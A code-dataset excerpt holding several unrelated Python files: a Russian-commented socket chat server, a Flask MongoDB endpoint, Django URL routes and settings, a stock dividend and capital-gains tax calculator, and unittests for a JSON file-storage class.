сообщений в сокеты клиентов\ndef write_messages(messages,to_clients, client_list):\n global names\n #log.debug('Запуск функции отправки сообщений клиентам')\n\n for message, sender in messages:\n # Если приватный канал, то отправка только одному получателю\n if message[ACTION] == MSG and message[TO] != MAIN_CHANNEL and message[TO] != message[FROM]:\n # получаем пользователя, которому отправляем сообщение\n to = message[TO]\n # обработка сервером команды who\n if message[MESSAGE] != 'who':\n message[MESSAGE] = f'(private){message[FROM]}:> {message[MESSAGE]}'\n try:\n connection = names[to]\n except:\n connection = names[message[FROM]]\n if message[TO] == SERVER and message[MESSAGE] == 'who':\n message[TO] = message[FROM]\n client_names = [key for key in names.keys()]\n message[MESSAGE] = f'<:SERVER:> Список клиентов в онлайн: {client_names}'\n log.debug(f'Пользователем {message[FROM]} запрошен список пользователей онлайн: {message[MESSAGE]}')\n else:\n message[TO] = message[FROM]\n message[FROM] = SERVER\n message[MESSAGE] = f'<:SERVER:> Клиент {to} не подключен. Отправка сообщения не возможна!'\n log.warning(message)\n # отправка сообщения\n try:\n connection.send(json.dumps(message).encode('utf-8'))\n except:\n log.warning(f'Сокет клиента {connection.fileno()} {connection.getpeername()} недоступен для отправки. 
Вероятно он отключился')\n names = {key: val for key, val in names.items() if val != connection}\n connection.close()\n client_list.remove(connection)\n # если общий канал, то отправка сообщения всем клиентам\n elif message[ACTION] == MSG and message[TO] == MAIN_CHANNEL:\n message[MESSAGE] = f'{message[FROM]}:> {message[MESSAGE]}'\n for connection in to_clients:\n # отправка сообщения\n try:\n connection.send(json.dumps(message).encode('utf-8'))\n except:\n log.warning(f'Сокет клиента {connection.fileno()} {connection.getpeername()} недоступен для отправки. Вероятно он отключился')\n names = {key: val for key, val in names.items() if val != connection}\n connection.close()\n client_list.remove(connection)\n\n# Функция проверки корректности приветственного сообщения и формирования ответа\n@logger\ndef check_correct_presence_and_response(presence_message):\n log.debug('Запуск ф-ии проверки корректности запроса')\n if ACTION in presence_message and presence_message[ACTION] == 'Unknown':\n return {RESPONSE: UNKNOWN_ERROR}\n elif ACTION in presence_message and \\\n presence_message[ACTION] == PRESENCE and \\\n TIME in presence_message and \\\n isinstance(presence_message[TIME], float):\n # Если всё хорошо шлем ОК\n log.debug(f'Проверка успешна, ответ: {RESPONSE}: {OK}')\n return {RESPONSE: OK}\n else:\n # Иначе шлем код ошибки\n log.warning(f'{RESPONSE}: {WRONG_REQUEST}, {ERROR}: \"Не верный запрос\"')\n return {RESPONSE: WRONG_REQUEST, ERROR: 'Не верный запрос'}\n\n@logger\ndef start_server(serv_addr=server_address, serv_port=server_port):\n alive = True\n global clients, names\n\n # создаем сокет для работы с клиентами\n with socket(AF_INET,SOCK_STREAM) as s:\n if not isinstance(serv_addr,str) or not isinstance(serv_port,int):\n log.error('Полученный адрес сервера или порт не является строкой или числом!')\n raise ValueError\n\n s.bind((serv_addr,serv_port))\n s.listen(1)\n s.settimeout(0.1)\n\n log.info('Запуск сервера! Готов к приему клиентов! 
\\n')\n\n while alive:\n try:\n # Прием запросов на подключение, проверка приветственного сообщения и ответ\n client, address = s.accept()\n client_message = json.loads(client.recv(1024).decode(\"utf-8\"))\n log.info(f'Принято сообщение от клиента: {client_message}')\n answer = check_correct_presence_and_response(client_message)\n client_name = client_message.get('user').get('account_name')\n log.info(f\"Приветствуем пользователя {client_name}!\")\n log.info(f'Отправка ответа клиенту: {answer}')\n client.send(json.dumps(answer).encode('utf-8'))\n except OSError as e:\n #за время socket timeout не было подключений\n pass\n else:\n log.info(f'Получен запрос на соединение от {str(address)}')\n names[client_name] = client\n clients.append(client)\n finally:\n r = []\n w = []\n e = []\n select_timeout = 0\n try:\n r, w, e = select.select(clients, clients, e, select_timeout)\n except:\n #исключение в случае дисконнекта любого из клиентов\n pass\n\n req = read_messages(r,clients)\n if req == {RESPONSE: SHUTDOWN}:\n alive = False\n log.info(f'Завершение работы сервера по команде от Admin')\n write_messages(req,w,clients)\n\n\n\nif __name__ == \"__main__\":\n # Проверка аргументов при запуске из консоли\n if len(sys.argv) > 1:\n for i in range(1,len(sys.argv)):\n if sys.argv[i] == '-p' and i+1 < len(sys.argv):\n server_port = sys.argv[i+1]\n if sys.argv[i] == '-a' and i+1 < len(sys.argv):\n server_address = sys.argv[i+1]\n\n #Показывать лог в консоль при запуске сервера напрямую\n server_stream_handler = logging.StreamHandler(sys.stdout)\n server_stream_handler.setLevel(logging.DEBUG)\n server_stream_handler.setFormatter(logs.config.server_config_log.log_format)\n log.addHandler(server_stream_handler)\n\n # Общие переменные для всех функций\n # Список сокетов клиентов и словарь аккаунтов клиентов с информацией о сокете\n clients = []\n names = {}\n\n start_server()\n sys.exit(0)", "sub_path": "Block3/Homework8/server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 9291, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 5, "usage_type": "call"}, {"api_name": "decorators.Log", "line_number": 6, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 61, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 73, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 119, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 125, "usage_type": "call"}, {"api_name": "select.select", "line_number": 139, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 154, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 155, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 156, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 157, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 158, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 159, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 162, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 162, "usage_type": "attribute"}, {"api_name": "logging.DEBUG", "line_number": 163, "usage_type": "attribute"}, {"api_name": "logs.config.server_config_log.config", "line_number": 164, "usage_type": "attribute"}, {"api_name": "logs.config.server_config_log", "line_number": 164, "usage_type": 
"name"}, {"api_name": "sys.exit", "line_number": 173, "usage_type": "call"}]} +{"seq_id": "470834834", "text": "from flask import jsonify, request\nfrom flask_restful import Resource\nfrom common.utils.v1.mongodb import MongoDB\n\nclass GetPaperInfoByType(Resource):\n def get(self):\n pass\n\n def post(self):\n # Get json data\n data = request.get_json()\n # Json dat\n for_type = data['type']\n\n # Init MongoDB class\n try:\n mongodb_class = MongoDB('paper')\n except Exception as e:\n return 'Error: {}'.format(e), 400\n\n # Find more than one array document\n cursor = mongodb_class.find(\"information\", { \"type\": for_type })\n\n # Append document cursor to array\n obj = []\n for document in cursor:\n obj.append({\n \"algorithm\": document['algorithm'],\n \"algorithmLabel\": document['algorithmLabel'],\n \"styles\": document['styles'],\n \"paper\": document['paper'],\n 'link': document['link'],\n 'technique': document['technique'],\n 'authors': document['authors'],\n 'type': document['type']\n })\n\n # Return json array to client\n res = jsonify(obj)\n res.status_code = 200\n return res", "sub_path": "app/server/python/server/resources/v1/getPaperInfoByType.py", "file_name": "getPaperInfoByType.py", "file_ext": "py", "file_size_in_byte": 1229, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "flask_restful.Resource", "line_number": 5, "usage_type": "name"}, {"api_name": "flask.request.get_json", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 11, "usage_type": "name"}, {"api_name": "common.utils.v1.mongodb.MongoDB", "line_number": 17, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "590905745", "text": "from django.urls import path\nfrom . 
import views\n\nurlpatterns = [\n path('home',views.homepage),\n path('signup',views.prosignup),\n path('login',views.loginn),\n path('custsignup',views.cussignup),\n path('prorgstn',views.profsignup),\n path('custregstn',views.custsignup),\n path('',views.homepage),\n path('search',views.search),\n]", "sub_path": "homecareapp/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 350, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.urls.path", "line_number": 5, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 8, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "172008319", "text": "from libs import (\n NAP_DIGIT_PRECISION,\n NAP_DIVIDEND_TAX,\n BNB_DATE_FORMAT,\n NAP_DATE_FORMAT,\n RECEIVED_DIVIDEND_ACTIVITY_TYPES,\n TAX_DIVIDEND_ACTIVITY_TYPES,\n)\nfrom libs.calculators.utils import get_avg_purchase_price, adjust_quantity, aggregate_purchases\n\nfrom collections import deque\nimport logging\n\nlogger = logging.getLogger(\"calculations\")\n\nimport decimal\n\ndecimal.getcontext().rounding = decimal.ROUND_HALF_UP\n\n\ndef calculate_win_loss(statements):\n purchases = {}\n sales = []\n for statement in statements:\n stock_symbol = statement.get(\"symbol\", None)\n\n if statement[\"activity_type\"] == \"BUY\":\n activity_quantity = abs(statement.get(\"quantity\", 0))\n\n logger.debug(\n f\"[BUY] [{stock_symbol}] td:[{statement['trade_date']}] qt:[{activity_quantity}] pr:[{statement['price']}] ex:[{statement['exchange_rate']}]\"\n )\n stock_queue = purchases.get(stock_symbol, deque())\n stock_queue.append(\n {\n \"price\": statement[\"price\"] * statement[\"exchange_rate\"],\n \"price_usd\": statement[\"price\"],\n \"quantity\": activity_quantity,\n \"trade_date\": statement[\"trade_date\"],\n }\n )\n purchases[stock_symbol] = stock_queue\n\n if statement[\"activity_type\"] == \"SELL\":\n activity_quantity = abs(statement.get(\"quantity\", 0))\n\n logger.debug(\n f\"[SELL] [{stock_symbol}] td:[{statement['trade_date']}] qt:[{activity_quantity}] pr:[{statement['price']}] ex:[{statement['exchange_rate']}]\"\n )\n\n if stock_symbol not in purchases or len(purchases[stock_symbol]) == 0:\n logging.warn(f\"No purchase information found for: [{stock_symbol}].\")\n continue\n\n stock_queue = purchases[stock_symbol]\n\n logger.debug(f\"Before adjustment: {stock_queue}\")\n\n avg_purchase_price = get_avg_purchase_price(stock_queue)\n logger.debug(f\"AVG price: [{avg_purchase_price}]\")\n\n purchase_price = avg_purchase_price * activity_quantity\n sell_price = statement[\"amount\"] * statement[\"exchange_rate\"]\n\n sale = {\n \"symbol\": stock_symbol,\n \"trade_date\": statement[\"trade_date\"].strftime(NAP_DATE_FORMAT),\n \"avg_purchase_price\": avg_purchase_price,\n \"purchase_price\": purchase_price.quantize(decimal.Decimal(NAP_DIGIT_PRECISION)),\n \"sell_price\": sell_price.quantize(decimal.Decimal(NAP_DIGIT_PRECISION)),\n \"sell_exchange_rate\": statement[\"exchange_rate\"].quantize(decimal.Decimal(NAP_DIGIT_PRECISION)),\n \"profit\": 
decimal.Decimal(0),\n \"loss\": decimal.Decimal(0),\n }\n\n profit_loss = (sale[\"sell_price\"] - sale[\"purchase_price\"]).quantize(decimal.Decimal(NAP_DIGIT_PRECISION))\n if profit_loss > 0:\n sale[\"profit\"] = profit_loss\n else:\n sale[\"loss\"] = profit_loss\n\n sales.append(sale)\n\n adjust_quantity(stock_queue, activity_quantity)\n logger.debug(f\"After adjustment: {purchases[stock_symbol]}\")\n\n if statement[\"activity_type\"] == \"SSP\" or statement[\"activity_type\"] == \"MAS\":\n activity_type = statement[\"activity_type\"]\n activity_quantity = statement[\"quantity\"]\n logger.debug(\n f\"[{activity_type}] [{stock_symbol}] td:[{statement['trade_date']}] qt:[{activity_quantity}] pr:[{statement['price']}] ex:[{statement['exchange_rate']}]\"\n )\n\n if activity_quantity < 0:\n stock_symbol = stock_symbol.replace(\".OLD\", \"\")\n if stock_symbol not in purchases or len(purchases[stock_symbol]) == 0:\n logging.warn(f\"No purchase information found for: [{stock_symbol}].\")\n continue\n\n stock_queue = purchases[stock_symbol]\n logger.debug(f\"Before surrender: {stock_queue}\")\n\n adjust_quantity(stock_queue, abs(activity_quantity))\n logger.debug(f\"After surrender: {stock_queue}\")\n continue\n\n stock_queue = purchases.get(stock_symbol, deque())\n logger.debug(f\"Before addition: {stock_queue}\")\n\n stock_queue.append(\n {\n \"price\": statement[\"price\"] * statement[\"exchange_rate\"],\n \"price_usd\": statement[\"price\"],\n \"quantity\": activity_quantity,\n \"trade_date\": statement[\"trade_date\"],\n }\n )\n logger.debug(f\"After addition: {stock_queue}\")\n\n return sales, calculate_remaining_purchases(purchases)\n\n\ndef calculate_remaining_purchases(purchases):\n result = {}\n for stock_symbol, stock_queue in aggregate_purchases(purchases).items():\n\n calculated_queue = []\n for purchase in stock_queue:\n calculated_queue.append(\n {\n **purchase,\n **{\n \"price_in_currency\": (purchase[\"price_usd\"] * purchase[\"quantity\"]).quantize(\n decimal.Decimal(NAP_DIGIT_PRECISION)\n ),\n \"price\": (purchase[\"price\"] * purchase[\"quantity\"]).quantize(\n decimal.Decimal(NAP_DIGIT_PRECISION)\n ),\n },\n }\n )\n result[stock_symbol] = calculated_queue\n\n return result\n\n\ndef calculate_dividends_tax(dividends):\n result = []\n for stock_symbol, stock_queue in dividends.items():\n for dividend in stock_queue:\n owe_tax = decimal.Decimal(0)\n if dividend[\"paid_tax_amount\"] == 0:\n owe_tax = dividend[\"gross_profit_amount\"] * decimal.Decimal(NAP_DIVIDEND_TAX)\n\n found_same_company_dividend = False\n for stock_data in result:\n if stock_data[\"stock_symbol\"] == stock_symbol:\n stock_data[\"paid_tax_amount\"] += dividend[\"paid_tax_amount\"]\n stock_data[\"gross_profit_amount\"] += dividend[\"gross_profit_amount\"]\n stock_data[\"owe_tax\"] += owe_tax\n found_same_company_dividend = True\n break\n\n if not found_same_company_dividend:\n result.append({**dividend, **{\"stock_symbol\": stock_symbol, \"owe_tax\": owe_tax}})\n return result\n\n\ndef calculate_dividends(statements):\n dividends = {}\n for statement in statements:\n\n if (\n statement[\"activity_type\"] in RECEIVED_DIVIDEND_ACTIVITY_TYPES\n or statement[\"activity_type\"] in TAX_DIVIDEND_ACTIVITY_TYPES\n ):\n stock_symbol = statement[\"symbol\"]\n activity_amount = statement[\"amount\"] * statement[\"exchange_rate\"]\n\n logger.debug(f\"[{statement['activity_type']}] [{stock_symbol}] am:[{activity_amount}]\")\n\n if statement[\"activity_type\"] in RECEIVED_DIVIDEND_ACTIVITY_TYPES:\n stock_queue = 
dividends.get(stock_symbol, deque())\n stock_queue.append(\n {\n \"company\": statement[\"company\"],\n \"gross_profit_amount\": activity_amount,\n \"paid_tax_amount\": decimal.Decimal(0),\n }\n )\n dividends[stock_symbol] = stock_queue\n continue\n\n if statement[\"activity_type\"] in TAX_DIVIDEND_ACTIVITY_TYPES:\n if stock_symbol not in dividends:\n logging.error(f\"No previous dividend information found for: [{stock_symbol}].\")\n raise SystemExit(1)\n\n stock_queue = dividends[stock_symbol]\n stock_queue[-1][\"paid_tax_amount\"] = (\n stock_queue[-1].get(\"paid_tax_amount\", decimal.Decimal(0)) + activity_amount\n )\n\n return calculate_dividends_tax(dividends)\n", "sub_path": "libs/calculators/default.py", "file_name": "default.py", "file_ext": "py", "file_size_in_byte": 8141, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "decimal.getcontext", "line_number": 18, "usage_type": "call"}, {"api_name": "decimal.ROUND_HALF_UP", "line_number": 18, "usage_type": "attribute"}, {"api_name": "collections.deque", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 52, "usage_type": "call"}, {"api_name": "libs.calculators.utils.get_avg_purchase_price", "line_number": 59, "usage_type": "call"}, {"api_name": "libs.NAP_DATE_FORMAT", "line_number": 67, "usage_type": "argument"}, {"api_name": "decimal.Decimal", "line_number": 69, "usage_type": "call"}, {"api_name": "libs.NAP_DIGIT_PRECISION", "line_number": 69, "usage_type": "argument"}, {"api_name": "decimal.Decimal", "line_number": 70, "usage_type": "call"}, {"api_name": "libs.NAP_DIGIT_PRECISION", "line_number": 70, "usage_type": "argument"}, {"api_name": "decimal.Decimal", "line_number": 71, "usage_type": "call"}, {"api_name": "libs.NAP_DIGIT_PRECISION", "line_number": 71, "usage_type": "argument"}, {"api_name": "decimal.Decimal", "line_number": 72, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 73, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 76, "usage_type": "call"}, {"api_name": "libs.NAP_DIGIT_PRECISION", "line_number": 76, "usage_type": "argument"}, {"api_name": "libs.calculators.utils.adjust_quantity", "line_number": 84, "usage_type": "call"}, {"api_name": "logging.warn", "line_number": 97, "usage_type": "call"}, {"api_name": "libs.calculators.utils.adjust_quantity", "line_number": 103, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 107, "usage_type": "call"}, {"api_name": "libs.calculators.utils.aggregate_purchases", "line_number": 125, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 134, "usage_type": "call"}, {"api_name": "libs.NAP_DIGIT_PRECISION", "line_number": 134, "usage_type": "argument"}, {"api_name": "decimal.Decimal", "line_number": 137, "usage_type": "call"}, {"api_name": "libs.NAP_DIGIT_PRECISION", "line_number": 137, "usage_type": "argument"}, {"api_name": "decimal.Decimal", "line_number": 151, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 153, "usage_type": "call"}, {"api_name": "libs.NAP_DIVIDEND_TAX", "line_number": 153, "usage_type": "argument"}, {"api_name": "libs.RECEIVED_DIVIDEND_ACTIVITY_TYPES", "line_number": 174, "usage_type": "name"}, {"api_name": "libs.TAX_DIVIDEND_ACTIVITY_TYPES", "line_number": 175, "usage_type": "name"}, {"api_name": "libs.RECEIVED_DIVIDEND_ACTIVITY_TYPES", "line_number": 182, "usage_type": 
"name"}, {"api_name": "collections.deque", "line_number": 183, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 188, "usage_type": "call"}, {"api_name": "libs.TAX_DIVIDEND_ACTIVITY_TYPES", "line_number": 194, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 196, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 201, "usage_type": "call"}]} +{"seq_id": "129204609", "text": "\"\"\"\nDjango settings for lubnik project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'lubnik.urls'\n\nWSGI_APPLICATION = 'lubnik.wsgi.application'\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'cs'\n\nTIME_ZONE = 'Europe/Prague'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = '/static/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n os.path.join(BASE_DIR, 'assets'),\n)\n\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, \"media\")\nTEMPLATE_DIRS = (os.path.join(BASE_DIR, 'templates'),)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.debug\",\n \"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.static\",\n \"django.core.context_processors.tz\",\n \"django.contrib.messages.context_processors.messages\",\n \"django.core.context_processors.request\",\n )\nGRAPPELLI_ADMIN_TITLE = 'lubnik.cz - administrace'\n\nFILEBROWSER_VERSIONS_BASEDIR = '_versions/'\nFILEBROWSER_VERSIONS = {\n 'admin_thumbnail': 
{'verbose_name': 'Admin Thumbnail', 'width': 60, 'height': 60, 'opts': 'crop'},\n 'thumbnail': {'verbose_name': 'Thumbnail', 'width': 200, 'height': 200, 'opts': 'crop'},\n 'medium_thumbnail': {'verbose_name': 'Thumbnail medium', 'width': 300, 'height': 250, 'opts': 'crop'},\n 'large_thumbnail': {'verbose_name': 'Thumbnail large', 'width': 500, 'height': 400, 'opts': 'crop'},\n 'small': {'verbose_name': 'Small', 'width': 140, 'height': 93, 'opts': ''},\n 'medium': {'verbose_name': 'Medium', 'width': 300, 'height': 225, 'opts': ''},\n 'big': {'verbose_name': 'Big', 'width': 460, 'height': '', 'opts': ''},\n 'large': {'verbose_name': 'Large', 'width': 640, 'height': '', 'opts': ''},\n}\nFILEBROWSER_NORMALIZE_FILENAME = True\n\nFILEBROWSER_OVERWRITE_EXISTING = False\n\nFILEBROWSER_EXTENSIONS = {\n 'Folder': [''],\n 'Image': ['.jpg', '.jpeg', '.gif', '.png', '.tif', '.tiff'],\n 'Document': ['.pdf', '.doc', '.rtf', '.txt', '.xls', '.csv', '.xlsx', '.docx'],\n 'Video': ['.mov', '.wmv', '.mpeg', '.mpg', '.avi', '.rm'],\n 'Audio': ['.mp3', '.mp4', '.wav', '.aiff', '.midi', '.m4p']\n }\n\nfrom filebrowser import signals\n\n\ndef post_upload_callback(sender, **kwargs):\n \"\"\"\n Receiver function called each time an upload has finished.\n \"\"\"\n if kwargs['file'].filetype == 'Image':\n if kwargs['file'].height > 1200 or kwargs['file'].width > 1920:\n resize_image(kwargs['file'].path_full)\n\nsignals.filebrowser_post_upload.connect(post_upload_callback)\n\n\ndef resize_image(image_path):\n from PIL import Image\n\n large_size = (1920, 1200)\n im = Image.open(image_path)\n\n image_w, image_h = im.size\n aspect_ratio = image_w / float(image_h)\n new_height = int(large_size[0] / aspect_ratio)\n\n if new_height < 1200:\n final_width = large_size[0]\n final_height = new_height\n else:\n final_width = int(aspect_ratio * large_size[1])\n final_height = large_size[1]\n\n resized_image = im.resize((final_width, final_height), Image.ANTIALIAS)\n\n # imaged.show()\n resized_image.save(image_path, quality=80)\n", "sub_path": "lubnik/settings/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 5188, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.dirname", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 84, "usage_type": "call"}, {"api_name": "os.path", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "filebrowser.signals.filebrowser_post_upload.connect", "line_number": 138, "usage_type": "call"}, {"api_name": "filebrowser.signals.filebrowser_post_upload", "line_number": 138, "usage_type": "attribute"}, {"api_name": "filebrowser.signals", "line_number": 138, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 145, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 145, "usage_type": "name"}, 
{"api_name": "PIL.Image.ANTIALIAS", "line_number": 158, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 158, "usage_type": "name"}]} +{"seq_id": "551465188", "text": "#!/usr/bin/python3\n\"\"\"Unittest for file_storage after task 5.\"\"\"\nimport unittest\nfrom models.base_model import BaseModel\nfrom models.engine.file_storage import FileStorage\nimport json\nimport os\nfrom shutil import copy2\n\n\nclass TestFileStorage(unittest.TestCase):\n \"\"\"Tests `FileStorage` class.\n \"\"\"\n __objects_backup = FileStorage._FileStorage__objects\n json_file = FileStorage._FileStorage__file_path\n json_file_backup = FileStorage._FileStorage__file_path + '.bup'\n\n @classmethod\n def setUpClass(cls):\n \"\"\"Setup for all tests in module.\n \"\"\"\n FileStorage._FileStorage__objects = dict()\n if os.path.exists(cls.json_file):\n copy2(cls.json_file, cls.json_file_backup)\n os.remove(cls.json_file)\n\n @classmethod\n def tearDownClass(cls):\n \"\"\"Teardown after all tests in module.\n \"\"\"\n FileStorage._FileStorage__objects = cls.__objects_backup\n if os.path.exists(cls.json_file_backup):\n copy2(cls.json_file_backup, cls.json_file)\n os.remove(cls.json_file_backup)\n\n def tearDown(self):\n \"\"\"Any needed cleanup, per test method.\n \"\"\"\n try:\n del (fs1, fs2, fs3, fs4)\n except NameError:\n pass\n try:\n del (bm1, bm2, bm3, bm4)\n except NameError:\n pass\n FileStorage._FileStorage__objects = dict()\n if os.path.exists(type(self).json_file):\n os.remove(type(self).json_file)\n\n def test_FileStorage(self):\n \"\"\"Task 5. Store first object\n Tests instantiation of class `FileStorage` and use in models__init__.\n \"\"\"\n # TypeError: any args\n self.assertRaises(TypeError, FileStorage, 'arg')\n # no args\n fs1 = FileStorage()\n self.assertIsInstance(fs1, FileStorage)\n # Normal use: as `storage` attr in models.__init__, imprtd to BaseModel\n bm1 = BaseModel()\n from models import storage\n self.assertIsInstance(storage, FileStorage)\n\n def test___file_path(self):\n \"\"\"Task 5. Store first object\n Tests private class attribute `__file_path`.\n \"\"\"\n fs1 = FileStorage()\n # new FileStorage object has __file_path\n self.assertIsNotNone(fs1._FileStorage__file_path)\n # __file_path is a string\n __file_path = fs1._FileStorage__file_path\n self.assertIsInstance(__file_path, str)\n # __file_path ends in '.json'\n self.assertEqual(__file_path[-5:], '.json')\n # __file_path is writable (permissions)\n content = 'Test text 0123456789abcdefghijklmnopqrstuvwxyz'\n with open(__file_path, 'w', encoding='utf-8') as file:\n file.write(content)\n with open(__file_path, 'r', encoding='utf-8') as file:\n self.assertEqual(content, file.read())\n\n def test___objects(self):\n \"\"\"Task 5. Store first object\n Tests private class attribute `__objects`.\n \"\"\"\n fs1 = FileStorage()\n # new FileStorage object has __objects\n self.assertIsNotNone(fs1._FileStorage__objects)\n # __objects is a dict\n __objects = fs1._FileStorage__objects\n self.assertIsInstance(__objects, dict)\n # __objects is empty to start\n self.assertEqual(len(__objects), 0)\n # __objects can store item with key:'.id', value: obj\n bm1 = BaseModel()\n bm1_dict = bm1.to_dict()\n bm1__objects_key = bm1_dict['__class__'] + '.' + bm1.id\n __objects[bm1__objects_key] = bm1\n self.assertIn(bm1__objects_key, __objects)\n self.assertEqual(__objects[bm1__objects_key], bm1)\n\n def test_all(self):\n \"\"\"Task 5. 
Store first object\n Tests public instance method `all()`.\n \"\"\"\n fs1 = FileStorage()\n # TypeError: any args\n self.assertRaises(TypeError, fs1.all, 'arg')\n # Normal use: no args\n fs1__objects = fs1.all()\n # returns __objects\n self.assertEqual(fs1._FileStorage__objects, fs1__objects)\n\n def test_new(self):\n \"\"\"Task 5. Store first object\n Tests public instance method `new()`. See also\n TestBaseModel.test_BaseModel.\n \"\"\"\n fs1 = FileStorage()\n # TypeError: no args\n self.assertRaises(TypeError, fs1.new)\n # TypeError: 2+ args\n self.assertRaises(TypeError, fs1.new, 'arg1', 'arg2')\n # called in BaseModel.__init__, to include new BM obj in __objects\n bm1 = BaseModel()\n from models import storage\n self.assertIn(bm1, storage._FileStorage__objects.values())\n # KeyError: __dict__ of arg obj doesn't include `id`\n # .id not string\n # Normal use: 1 arg of obj whose __dict__ includes `id`\n # cls.__objects updated with key:'.id', value: obj\n # key:'.id' already in self.__objects\n\n def test_save(self):\n \"\"\"Task 5. Store first object\n Tests public instance method `save()`. See also\n TestBaseModel.test_save()\n \"\"\"\n fs1 = FileStorage()\n # TypeError: any args\n self.assertRaises(TypeError, fs1.save, 'arg')\n # Correct use: no args\n fs1.save()\n # Normal use: called by BaseModel.save(), writes to 